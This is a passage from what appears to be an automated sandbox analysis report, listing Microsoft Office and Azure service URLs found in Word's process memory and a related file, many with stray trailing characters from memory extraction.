Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://enrichment.osi.office.net/
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/E
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1VU
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1yW
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1#R
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.jsonGS
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml8SQM
Source: WINWORD.EXE, 00000000.00000000.306084548.000000000D32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/y
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://entitlement.diagnostics.office.comIE
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://entity.osi.office.net/t
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech)P
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechZQwO
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidi
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://globaldisco.crm.dynamics.comom
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.ppe.windows.net=
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://graph.windows.net
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://graph.windows.net/
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/ent
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.com
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.comu
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.comx
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: WINWORD.EXE, 00000000.00000000.325229073.000000000D281000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3das/
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: WINWORD.EXE, 00000000.00000000.325229073.000000000D281000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1=
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1o
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnostics.office.com2ElO
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientl
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientstoret
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: WINWORD.EXE, 00000000.00000000.305945925.000000000D311000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: WINWORD.EXE, 00000000.00000000.305945925.000000000D311000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebookf
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: WINWORD.EXE, 00000000.00000000.305945925.000000000D311000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrivec-HO
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: WINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediamlr%
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://invites.office.com/
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetvoicesN_
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://lifecycle.office.com
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://lifecycle.office.comP
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://lifecycle.office.comov
Source: WINWORD.EXE, 00000000.00000000.320784675.000000001252E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.comj
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorizeIM
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorizewM%M
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://login.windows.local
Source: WINWORD.EXE, 00000000.00000000.306836673.000000000D407000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.localtes
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize#
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize#xdN6
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize$
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize-
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize.
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize/2
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize0
Source: WINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize054
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize2hiL
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize3
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize3khM
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize4
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize6ziL
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize7ehM
Source: WINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize874
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize8e_M
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize;BiL
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize=
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeAx
Source: WINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeCache
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeCz
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeDe
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeGB
Source: WINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeH.4
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeHB
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeM
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeN=
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeOh
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizePh
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeQ
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeR
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeRxuN7
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeS
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeTz
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeYB
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeZM
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeaz&L
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizebe%M
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecomfM6M
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeeB7L
Source: WINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizefic
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeg
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizej
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizek
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizek27L
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizen
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeox
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizep
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeq
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizer
Source: WINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizerdml
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizese
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizetenk%M
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizevB&L
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizexM
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize~h
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://management.azure.com
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://management.azure.com/
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://management.azure.com/#
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://messaging.action.office.com/
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://messaging.action.office.com/setcampaignactionh
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://messaging.engagement.office.com/
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregatorO
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16T
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://messaging.office.com/
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy0RhN
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://ncus.contentsync.
